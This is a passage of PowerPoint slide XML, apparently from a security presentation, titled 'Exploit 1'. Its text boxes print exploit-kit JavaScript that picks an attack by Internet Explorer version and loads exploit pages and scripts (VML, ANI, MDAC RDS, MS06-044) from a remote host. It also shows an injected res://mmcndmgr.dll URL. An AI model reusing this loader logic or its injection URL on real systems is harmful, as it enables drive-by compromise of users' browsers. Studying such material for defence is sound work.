              <a:t>("http://"+d+"/E/ff154/ff154.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(D){return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://"+d+"/E/ms06044/ww.js";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="res://mmcndmgr.dll/prevsym12.htm# %29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27"+ak+"%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(D){return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/vml/vml.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="1600200"/>
            <a:ext cx="3657600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>bq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	if(D){return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	switch(c){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	case "ie7":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	case "ie6_xpsp2":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/ani/ani1.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	case "ie6_xpsp1":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/ani/ani2.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	case "ie6_xpsp0":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/ani/ani3.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	case "ie6_2k":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/ani/ani4.htm");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>default:break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	if(D){return true;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("http://"+d+"/E/rds/mdac_rds.js");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1236525"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1998525"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
